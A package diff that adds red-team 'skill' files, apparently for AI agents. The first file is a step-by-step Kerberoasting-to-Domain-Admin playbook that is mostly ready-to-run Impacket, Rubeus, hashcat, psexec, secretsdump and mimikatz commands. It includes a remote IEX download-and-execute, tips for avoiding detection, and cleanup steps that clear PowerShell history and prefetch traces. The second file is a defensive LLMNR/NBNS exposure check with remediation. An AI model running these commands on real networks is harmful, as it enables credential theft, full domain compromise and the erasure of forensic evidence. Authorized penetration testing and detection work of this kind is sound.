rtexit-method 0.1.0 → 0.1.2

package/packaged-assets/.agents/skills/rt-scenario-n001/SKILL.md

@@ -0,0 +1,573 @@
+---
+name: rt-scenario-n001
+description: "N-001: Kerberoasting → Service Account Compromise → Domain Admin. Domain: network. Attack chain: enumerate service accounts with SPNs → request TGS tickets → save to file → hashcat crack → use service account → find path to Domain Admin via BloodHound. MITRE: T1558.003 → T1110.002 → T1078.002. Real example: SQLSvc has admin rights on DC → Kerberoast → crack password → PSexec to DC → domain admin"
+---
+
+# N-001: Kerberoasting → Service Account Compromise → Domain Admin
+
+## Overview
+
+**Attack Objective:** Compromise a domain-joined service account by requesting and cracking its Kerberos TGS ticket (Kerberoasting), then leveraging that account's privileges — or a BloodHound-identified path — to achieve Domain Admin access.
+
+**Required Access Level:** Low (any valid domain user account suffices; no elevated privileges required to enumerate or request tickets)
+
+**Estimated Time to Execute:**
+- Enumeration + ticket request: 5–15 minutes
+- Offline cracking: 15 minutes to several hours (hardware and password complexity dependent)
+- Lateral movement to Domain Admin: 15–60 minutes
+
+**Detection Risk Level:** Medium
+- Ticket requests are normal Kerberos traffic, but requesting RC4-encrypted tickets for many SPNs is anomalous
+- Offline cracking leaves no network footprint
+- PSexec and lateral movement phase is higher risk (High)
+
+---
+
+## Prerequisites
+
+### Required Tools
+
+```bash
+# Impacket suite (GetUserSPNs, PSexec, secretsdump)
+pip install impacket
+# or clone from source
+git clone https://github.com/fortra/impacket.git && cd impacket && pip install .
+
+# BloodHound + SharpHound collector
+# BloodHound CE (Docker):
+docker pull specterops/bloodhound
+# or download BloodHound legacy: https://github.com/BloodHoundAD/BloodHound/releases
+
+# SharpHound (run on target, Windows)
+# Download: https://github.com/BloodHoundAD/SharpHound/releases
+# Invoke-BloodHound (PowerShell):
+IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1')
+
+# Hashcat
+# Linux:
+sudo apt install hashcat
+# Windows: https://hashcat.net/hashcat/
+
+# CrackMapExec (lateral movement verification)
+pip install crackmapexec
+# or: pipx install crackmapexec
+
+# Rubeus (Windows-native Kerberoasting alternative)
+# Download: https://github.com/GhostPack/Rubeus/releases
+
+# PowerView (AD enumeration)
+# Download: https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
+```
+
+### Required Access or Conditions
+
+- A valid domain user account (standard user, no special privileges required)
+- Network connectivity to a Domain Controller (ports 88/TCP Kerberos, 389/TCP LDAP, 445/TCP SMB)
+- At least one service account with a registered SPN that uses RC4 (or AES, crackable but slower) encryption
+- Authorization: written permission (Rules of Engagement) for the target domain
+
+### Skill Level
+
+**INTERMEDIATE** — Requires familiarity with Active Directory concepts (SPNs, Kerberos, TGS), command-line tools, and hashcat usage. BloodHound analysis requires understanding of AD attack paths.
+
+---
+
+## Attack Chain
+
+```
+[Domain User Account]
+        |
+        v
+[1] Enumerate service accounts with SPNs
+    (GetUserSPNs.py / PowerView / Rubeus)
+        |
+        v
+[2] Request TGS tickets for target SPNs
+    (Kerberoasting — T1558.003)
+        |
+        v
+[3] Save hashes to file
+    (offline — no further network interaction needed)
+        |
+        v
+[4] Crack hashes offline with hashcat
+    (Brute Force / Dictionary — T1110.002)
+        |
+        v
+[5] Authenticate as compromised service account
+    (Valid Accounts: Domain Accounts — T1078.002)
+        |
+        v
+[6] Run BloodHound to map path to Domain Admin
+        |
+        v
+[7] Execute lateral movement / privilege escalation path
+        |
+        v
+[DOMAIN ADMIN]
+```
+
+**MITRE ATT&CK Chain:** T1558.003 → T1110.002 → T1078.002
+
+---
+
+## Step-by-Step Execution
+
+### Step 1: Enumerate Service Accounts with SPNs
+
+**Objective:** Identify accounts that have a Service Principal Name (SPN) registered — these are Kerberoastable.
+
+**Option A — From Linux (Impacket):**
+```bash
+GetUserSPNs.py -dc-ip 192.168.1.10 CORP.LOCAL/jsmith:Password123 -outputfile spns_found.txt
+```
+
+**Option B — From Windows (PowerView):**
+```powershell
+Import-Module .\PowerView.ps1
+Get-DomainUser -SPN | Select-Object samaccountname, serviceprincipalname, description
+```
+
+**Option C — From Windows (native LDAP query):**
+```powershell
+setspn -Q */* | findstr /i "CN="
+```
+
+**Option D — From Windows (Rubeus):**
+```powershell
+.\Rubeus.exe kerberoast /stats
+```
+
+**Expected Output (Impacket):**
+```
+ServicePrincipalName                Name     MemberOf                         PasswordLastSet
+----------------------------------  -------  --------------------------------  -------------------
+MSSQLSvc/sql01.corp.local:1433      SQLSvc   CN=Domain Admins,CN=Users,...     2022-03-15 09:12:33
+HTTP/webapp01.corp.local            WebSvc   CN=Web Servers,CN=Groups,...      2023-01-10 14:05:11
+```
+
+**What to look for:**
+- Accounts with weak or old passwords (PasswordLastSet far in the past)
+- Accounts with high-value group memberships (Domain Admins, Administrators, etc.)
+- RC4-encrypted tickets (type 0x17) — faster to crack than AES
+
+**Fallback:** If LDAP is blocked on 389, try 636 (LDAPS) or use `-no-pass` with a hash if you have one.
+
+---
+
+### Step 2: Request TGS Tickets (Kerberoast)
+
+**Objective:** Request Kerberos TGS tickets for the identified SPNs. The ticket is encrypted with the service account's password hash — we can crack it offline.
+
+**Option A — From Linux (Impacket, all SPNs):**
+```bash
+GetUserSPNs.py -dc-ip 192.168.1.10 CORP.LOCAL/jsmith:Password123 -request -outputfile kerberoast_hashes.txt
+```
+
+**Option B — Target a specific account:**
+```bash
+GetUserSPNs.py -dc-ip 192.168.1.10 CORP.LOCAL/jsmith:Password123 -request-user SQLSvc -outputfile sqlsvc_hash.txt
+```
+
+**Option C — From Windows (Rubeus, RC4 downgrade for faster cracking):**
+```powershell
+.\Rubeus.exe kerberoast /rc4opsec /outfile:kerberoast_hashes.txt
+```
+
+**Option D — From Windows (Invoke-Kerberoast via PowerView):**
+```powershell
+Import-Module .\PowerView.ps1
+Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty Hash | Out-File -FilePath kerberoast_hashes.txt -Encoding ASCII
+```
+
+**Expected Output (hash file):**
+```
+$krb5tgs$23$*SQLSvc$CORP.LOCAL$MSSQLSvc/sql01.corp.local:1433*$A1B2C3D4E5F6...
+[long hash string]
+```
+
+Hash type `$krb5tgs$23$` = RC4 (hashcat mode 13100 — faster)
+Hash type `$krb5tgs$18$` = AES256 (hashcat mode 19700 — slower)
+
+**Fallback:** If the account enforces AES-only, the ticket will be AES-encrypted. Still crackable but requires a larger wordlist and more time. Use `/enctype:rc4` in Rubeus only if the account's `msDS-SupportedEncryptionTypes` allows RC4.
+
+---
+
+### Step 3: Save Hashes to File
+
+Hashes are already saved via `-outputfile` in Step 2. Verify:
+
+```bash
+cat kerberoast_hashes.txt
+# Confirm at least one complete hash line starting with $krb5tgs$
+```
+
+**Transfer to cracking machine if needed:**
+```bash
+scp kerberoast_hashes.txt cracker@192.168.50.5:/opt/cracking/
+```
+
+---
+
+### Step 4: Crack Hashes Offline with Hashcat
+
+**Objective:** Recover plaintext passwords from the captured TGS ticket hashes.
+
+**Mode 13100 = RC4 (etype 23), Mode 19700 = AES256 (etype 18)**
+
+**Step 4a — Dictionary attack with rockyou:**
+```bash
+hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt --force
+```
+
+**Step 4b — Dictionary + rules (recommended for service accounts):**
+```bash
+hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
+```
+
+**Step 4c — Corporate password pattern (common for service accounts: CompanyName+Year+!):**
+```bash
+# Create custom wordlist
+cat > corp_patterns.txt << EOF
+Winter2022
+Winter2023
+Summer2022
+Summer2023
+Company2022!
+Company2023!
+ServiceAcct1
+SQL2019!
+EOF
+
+hashcat -m 13100 kerberoast_hashes.txt corp_patterns.txt -r /usr/share/hashcat/rules/best64.rule --force
+```
+
+**Step 4d — AES256 hashes:**
+```bash
+hashcat -m 19700 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
+```
+
+**Show cracked passwords:**
+```bash
+hashcat -m 13100 kerberoast_hashes.txt --show
+```
+
+**Expected Output:**
+```
+$krb5tgs$23$*SQLSvc$CORP.LOCAL$...*:<long hash>:SQL2019!
+```
+
+Cracked password: `SQL2019!`
+
+**Fallback:** If rockyou fails, try:
+- `hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule`
+- SecLists password lists: `https://github.com/danielmiessler/SecLists/tree/master/Passwords`
+- Hybrid attack: `hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt -a 6 ?d?d?d?d`
+
+---
+
+### Step 5: Authenticate as Compromised Service Account
+
+**Objective:** Verify the cracked credentials and establish access.
+
+**Step 5a — Verify credentials:**
+```bash
+crackmapexec smb 192.168.1.10 -u SQLSvc -p 'SQL2019!' -d CORP.LOCAL
+```
+
+**Expected Output:**
+```
+SMB   192.168.1.10  445  DC01  [+] CORP.LOCAL\SQLSvc:SQL2019! (Pwn3d!)
+```
+
+`(Pwn3d!)` indicates local admin rights on the target.
+
+**Step 5b — Check what systems the account has access to:**
+```bash
+crackmapexec smb 192.168.1.0/24 -u SQLSvc -p 'SQL2019!' -d CORP.LOCAL
+```
+
+**Step 5c — Get a shell (if local admin on DC):**
+```bash
+psexec.py CORP.LOCAL/SQLSvc:'SQL2019!'@192.168.1.10
+```
+
+**Alternative (WMIexec — lower footprint than PSexec):**
+```bash
+wmiexec.py CORP.LOCAL/SQLSvc:'SQL2019!'@192.168.1.10
+```
+
+**Alternative (Evil-WinRM if WinRM is enabled):**
+```bash
+evil-winrm -i 192.168.1.10 -u SQLSvc -p 'SQL2019!'
+```
+
+**Fallback:** If direct access is blocked, use the credentials in BloodHound enumeration (Step 6) to find an alternative path.
+
+---
+
+### Step 6: Run BloodHound to Map Path to Domain Admin
+
+**Objective:** Identify the shortest path from the compromised SQLSvc account to Domain Admin.
+
+**Step 6a — Collect BloodHound data (run on domain-joined Windows host as SQLSvc):**
+
+```powershell
+# Using SharpHound executable
+.\SharpHound.exe -c All --outputdirectory C:\Temp\bh_output
+
+# Or using PowerShell module
+IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1')
+Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Temp\bh_output
+```
+
+**Step 6b — From Linux using bloodhound-python:**
+```bash
+pip install bloodhound
+bloodhound-python -u SQLSvc -p 'SQL2019!' -d CORP.LOCAL -dc dc01.corp.local -c All -ns 192.168.1.10
+```
+
+**Step 6c — Import data into BloodHound:**
+```
+1. Start BloodHound (or BloodHound CE via Docker)
+2. Upload the ZIP file from SharpHound collection
+3. Navigate to: Analysis → Shortest Paths → Shortest Path to Domain Admins
+4. Set start node to: SQLSvc
+```
+
+**Key BloodHound queries to run:**
+```cypher
+-- Find shortest path from SQLSvc to Domain Admins
+MATCH p=shortestPath((u:User {name:"SQLSVC@CORP.LOCAL"})-[*1..]->(g:Group {name:"DOMAIN ADMINS@CORP.LOCAL"})) RETURN p
+
+-- Find all paths (not just shortest)
+MATCH p=(u:User {name:"SQLSVC@CORP.LOCAL"})-[*1..5]->(g:Group {name:"DOMAIN ADMINS@CORP.LOCAL"}) RETURN p
+
+-- Check if SQLSvc has local admin rights anywhere
+MATCH (u:User {name:"SQLSVC@CORP.LOCAL"})-[:AdminTo]->(c:Computer) RETURN c.name
+```
+
+**Expected Findings:**
+- SQLSvc has `AdminTo` relationship on DC01
+- Or: SQLSvc → `MemberOf` → Group → `AdminTo` → DC01
+- Or: SQLSvc → `GenericAll` / `WriteDACL` → higher-privileged account
+
+---
+
+### Step 7: Execute Lateral Movement / Privilege Escalation
+
+**Scenario A — SQLSvc has direct admin on DC (real-world reference case):**
+
+```bash
+# PSexec to DC as SQLSvc
+psexec.py CORP.LOCAL/SQLSvc:'SQL2019!'@dc01.corp.local
+
+# Dump domain credentials
+secretsdump.py CORP.LOCAL/SQLSvc:'SQL2019!'@dc01.corp.local
+
+# Or once on DC, run mimikatz
+.\mimikatz.exe "privilege::debug" "lsadump::lsa /patch" "exit"
+```
+
+**Scenario B — SQLSvc has GenericAll/WriteDACL over another account:**
+
+```powershell
+# Reset target account's password
+Set-DomainUserPassword -Identity TargetAdmin -AccountPassword (ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force) -Credential $cred
+
+# Or add SQLSvc to Domain Admins directly (if WriteDACL on group)
+Add-DomainGroupMember -Identity "Domain Admins" -Members SQLSvc
+```
+
+**Scenario C — SQLSvc can DCSync (if replication rights):**
+
+```bash
+secretsdump.py -just-dc CORP.LOCAL/SQLSvc:'SQL2019!'@192.168.1.10
+```
+
+**Confirm Domain Admin access:**
+```bash
+crackmapexec smb 192.168.1.10 -u Administrator -H <NTLM_hash_from_dump> --shares
+# or
+wmiexec.py -hashes :<NTLM> CORP.LOCAL/Administrator@192.168.1.10
+```
+
+---
+
+## Real-World Reference
+
+**Scenario:** SQLSvc account at a mid-size organization running SQL Server 2019.
+
+1. **Discovery:** Internal network access (post-phish or assumed-breach engagement). Ran `GetUserSPNs.py` and found `SQLSvc` with SPN `MSSQLSvc/sql01.corp.local:1433`. `PasswordLastSet` was 4 years old. Account was a member of `Domain Admins` (misconfiguration — service accounts should never be DA members).
+
+2. **Kerberoast:** Requested TGS ticket in ~2 seconds. Hash type was RC4 (etype 23).
+
+3. **Crack:** Dictionary attack with `rockyou.txt + best64.rule` cracked the password (`SQL2019!`) in under 3 minutes on a mid-range GPU.
+
+4. **Exploitation:** `psexec.py` to the Domain Controller using SQLSvc credentials succeeded immediately. The account had unrestricted shell access on the DC.
+
+5. **DA Achieved:** Ran `secretsdump.py` to extract the `krbtgt` hash and all domain account hashes. Created a Golden Ticket for persistence. Full domain compromise from initial access: **47 minutes.**
+
+**Root causes:**
+- Service account was member of Domain Admins (unnecessary privilege)
+- Password had not been rotated in 4 years
+- No AES-only enforcement (RC4 still permitted)
+- No detection rule for bulk TGS requests
+
+---
+
+## MITRE ATT&CK Mapping
+
+| Step | Action | Tactic | Technique | Sub-technique |
+|------|--------|--------|-----------|---------------|
+| 1 | Enumerate SPNs via LDAP | Discovery | T1018 Remote System Discovery / T1087 Account Discovery | T1087.002 Domain Account |
+| 2 | Request TGS tickets for SPNs | Credential Access | T1558 Steal or Forge Kerberos Tickets | T1558.003 Kerberoasting |
+| 3 | Save ticket hashes to file | Collection | T1005 Data from Local System | — |
+| 4 | Crack hashes offline with hashcat | Credential Access | T1110 Brute Force | T1110.002 Password Cracking |
+| 5 | Authenticate as SQLSvc | Defense Evasion / Lateral Movement | T1078 Valid Accounts | T1078.002 Domain Accounts |
+| 6 | BloodHound AD enumeration | Discovery | T1482 Domain Trust Discovery / T1069 Permission Groups Discovery | T1069.002 Domain Groups |
+| 7 | PSexec / WMIexec to DC | Lateral Movement | T1021 Remote Services | T1021.002 SMB/Windows Admin Shares |
+| 7 | Secretsdump / credential dump | Credential Access | T1003 OS Credential Dumping | T1003.003 NTDS |
+| 7 | Add account to DA group | Privilege Escalation | T1098 Account Manipulation | — |
+
+---
+
+## Detection & OPSEC
+
+### How This Attack Is Detected
+
+**Kerberoasting Detection:**
+- **Event ID 4769** — Kerberos Service Ticket Operations: filter for `Ticket Encryption Type = 0x17` (RC4) for service accounts that normally use AES
+- **Volume anomaly:** Multiple TGS requests for different SPNs in a short window from a single source IP
+- **ATA / Defender for Identity:** Built-in Kerberoasting detection alert (raises when RC4 TGS requested for accounts configured with AES)
+- **SIEM rule:** `EventID=4769 AND TicketEncryptionType=0x17 AND ServiceName != krbtgt` with threshold-based alerting
+
+**Lateral Movement Detection:**
+- **Event ID 7045** (Service Install) — PSexec creates a service on the target
+- **Event ID 4624** (Logon Type 3) — Network logon from unexpected source
+- **Event ID 4648** — Explicit credential logon
+- **Sysmon Event ID 1** — Process creation (psexec spawning cmd.exe under SYSTEM)
+
+**Credential Dumping Detection:**
+- **Event ID 4662** — Object access on AD objects with replication rights (DCSync)
+- **Defender for Identity:** DCSync alert triggers on non-DC accounts requesting replication
+
+### How to Reduce Detection Risk (Authorized Engagements)
+
+- **Target specific accounts** rather than requesting tickets for all SPNs at once — reduces volume anomaly
+- **Use AES tickets** where possible (less anomalous than RC4 downgrade)
+- **Stagger requests** over time (minutes apart) if stealth is a requirement
+- **Avoid PSexec** — use WMIexec or Evil-WinRM instead (less noisy, no service install)
+- **Use legitimate admin tools** (WMIC, PowerShell remoting) if they are already in use in the environment
+- **BloodHound collection:** Use `--stealth` flag in SharpHound to reduce LDAP query volume; run during business hours to blend in
+
+```powershell
+# Stealth SharpHound collection
+.\SharpHound.exe -c DCOnly --stealth --outputdirectory C:\Temp\
+```
+
+### Artifacts Left Behind
+
+| Artifact | Location | Notes |
+|----------|----------|-------|
+| SharpHound ZIP output | C:\Temp\ (or specified path) | Delete after collection |
+| SharpHound binary | Wherever dropped | Delete after use |
+| PSexec service | Target's Services (PSEXESVC) | Removed on exit but check SCM |
+| Event logs | DC and target system Security log | Entries for 4769, 4624, 7045 |
+| Prefetch files | C:\Windows\Prefetch\ | Execution traces for dropped binaries |
+| PowerShell history | %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt | Clear or avoid |
+| Network captures | Potentially captured by IDS/NDR | Kerberos traffic is visible on the wire |
+
+---
+
+## Cleanup
+
+Complete these steps after the authorized engagement to restore the environment.
+
+### 1. Remove Dropped Files
+
+```powershell
+# On target systems — remove all dropped tools
+Remove-Item -Path "C:\Temp\SharpHound.exe" -Force
+Remove-Item -Path "C:\Temp\Rubeus.exe" -Force
+Remove-Item -Path "C:\Temp\mimikatz.exe" -Force
+Remove-Item -Path "C:\Temp\*.zip" -Force   # BloodHound output files
+Remove-Item -Path "C:\Temp\bh_output\" -Recurse -Force
+```
+
+### 2. Clear PowerShell History
+
+```powershell
+# On each compromised host
+Remove-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Force
+Clear-History
+```
+
+### 3. Remove Prefetch Traces
+
+```powershell
+# Requires admin — remove prefetch for dropped tools
+Remove-Item "C:\Windows\Prefetch\SHARPHOUND*" -Force
+Remove-Item "C:\Windows\Prefetch\RUBEUS*" -Force
+Remove-Item "C:\Windows\Prefetch\MIMIKATZ*" -Force
+```
+
+### 4. Verify PSexec Service Removed
+
+```powershell
+# Check if PSEXESVC remains on target
+Get-Service -Name PSEXESVC -ErrorAction SilentlyContinue
+# If present:
+Stop-Service PSEXESVC -Force
+sc.exe delete PSEXESVC
+```
+
+### 5. Revert Any AD Changes Made
+
+```powershell
+# If you added any accounts to groups, remove them
+Remove-DomainGroupMember -Identity "Domain Admins" -Members <added_account>
+
+# If you reset any passwords, restore original (coordinate with client)
+# If you created any accounts, delete them
+Remove-ADUser -Identity <test_account> -Confirm:$false
+```
+
+### 6. Document Artifacts for Client Report
+
+Before cleanup, document:
+- Event IDs generated (for detection validation report)
+- Systems accessed and timestamps
+- Credentials obtained (for inclusion in findings report — do not transmit insecurely)
+- BloodHound paths identified
+
+---
+
+## References
+
+### Tools
+- **Impacket** — https://github.com/fortra/impacket (GetUserSPNs.py, psexec.py, secretsdump.py, wmiexec.py)
+- **Rubeus** — https://github.com/GhostPack/Rubeus (Windows-native Kerberoasting)
+- **BloodHound** — https://github.com/BloodHoundAD/BloodHound
+- **BloodHound CE** — https://github.com/SpecterOps/BloodHound
+- **SharpHound** — https://github.com/BloodHoundAD/SharpHound
+- **bloodhound-python** — https://github.com/dirkjanm/BloodHound.py
+- **PowerView** — https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
+- **Hashcat** — https://hashcat.net/hashcat/
+- **CrackMapExec** — https://github.com/byt3bl33d3r/CrackMapExec
+- **Evil-WinRM** — https://github.com/Hackplayers/evil-winrm
+
+### Password Lists
+- **rockyou.txt** — Pre-installed on Kali; https://github.com/brannondorsey/naive-hashcat/releases
+- **SecLists** — https://github.com/danielmiessler/SecLists/tree/master/Passwords
+
+### MITRE ATT&CK References
+- **T1558.003 Kerberoasting** — https://attack.mitre.org/techniques/T1558/003/
+- **T1110.002 Password Cracking** — https://attack.mitre.org/techniques/T1110/002/
+- **T1078.002 Domain Accounts** — https://attack.mitre.org/techniques/T1078/002/
+
+### Further Reading
+- **The Kerberoasting Attack** (SpecterOps) — https://posts.specteropsio/kerberoasting-revisited-d434351bd4d1
+- **Detecting Kerberoasting** (Microsoft) — https://docs.microsoft.com/en-us/azure/defender-for-identity/alerts-overview
+- **Managed Service Accounts** (Microsoft) — https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/
+- **Hashcat example hashes** — https://hashcat.net/wiki/doku.php?id=example_hashes

package/packaged-assets/.agents/skills/rt-scenario-n002/SKILL.md

@@ -0,0 +1,112 @@
+---
+name: rt-scenario-n002
+description: "N-002: LLMNR/NBNS exposure assessment leading to credential-risk and lateral-movement impact analysis. Domain: network. Authorized internal scenario focused on detection, control validation, and remediation."
+---
+
+# N-002: LLMNR/NBNS Credential Exposure Risk
+
+> Execute only on explicitly approved internal network segments. Do not collect, crack, or reuse real user credentials unless the SEAD specifically authorizes credential testing and defines handling rules.
+
+## Overview
+
+LLMNR, NBNS, and related legacy name-resolution behavior can cause clients to disclose authentication material to untrusted responders on the same network. This scenario evaluates whether the environment is vulnerable, how far the risk could extend, and which controls would break the chain.
+
+| Field | Value |
+|---|---|
+| Domain | Network / Active Directory |
+| Objective | Validate legacy name-resolution credential exposure risk |
+| Required Access | Internal network presence |
+| Detection Risk | Medium |
+| Primary Impact | Credential exposure and possible lateral movement |
+
+## Prerequisites
+
+- Internal VLAN/subnet explicitly in scope.
+- SOC/NOC notification completed if required.
+- Credential handling rules defined.
+- Test workstation or controlled lab user available.
+- No production password cracking unless explicitly approved.
+
+## Attack Chain Model
+
+1. Attacker gains internal network position.
+2. Clients attempt legacy name resolution.
+3. Authentication material may be exposed to an untrusted responder.
+4. Exposed credentials may enable access to additional hosts.
+5. Lateral access may expose sensitive shares or admin interfaces.
+
+## Safe Validation Workflow
+
+### Step 1 - Confirm Protocol Posture
+
+Review GPOs, endpoint configuration, and network monitoring for:
+
+- LLMNR enabled/disabled.
+- NetBIOS over TCP/IP enabled/disabled.
+- mDNS exposure.
+- SMB signing requirement.
+- Local admin password uniqueness.
+
+### Step 2 - Passive Observation
+
+Where approved, observe whether clients emit legacy name-resolution requests. Record only metadata needed for proof:
+
+- Timestamp.
+- Segment.
+- Protocol.
+- Query name.
+- Test host identifier.
+
+### Step 3 - Controlled Test
+
+Use a client-approved test machine or lab account to trigger a harmless name-resolution event and confirm whether the network would allow spoofed responses.
+
+### Step 4 - Impact Modeling
+
+Do not use real credentials by default. Model impact from:
+
+- Password policy.
+- Local admin reuse.
+- SMB signing posture.
+- EDR/SOC detection.
+- Network segmentation.
+
+## MITRE ATT&CK Mapping
+
+| Phase | Tactic | Technique |
+|---|---|---|
+| Exposure | Credential Access | Adversary-in-the-Middle |
+| Credential Use | Credential Access | Password Cracking |
+| Movement | Lateral Movement | Valid Accounts |
+
+## Evidence
+
+Capture:
+
+- GPO/configuration screenshots.
+- Passive protocol observations.
+- Test host proof.
+- Detection or alert evidence if generated.
+
+## Detection
+
+- Legacy name-resolution requests from endpoints.
+- Suspicious responder behavior.
+- SMB authentication to unusual hosts.
+- Authentication failures after capture attempts.
+
+## Remediation
+
+- Disable LLMNR and NetBIOS where possible.
+- Require SMB signing.
+- Deploy Windows LAPS or equivalent.
+- Enforce strong password policy.
+- Segment user networks.
+- Alert on name-resolution poisoning patterns.
+
+## Autodoc
+
+```bash
+python _rtexit/scripts/autodoc_engine.py log --skill rt-scenario-n002 --phase exploitation --cmd "LLMNR/NBNS posture validation" --output "legacy name resolution risk summary"
+```
+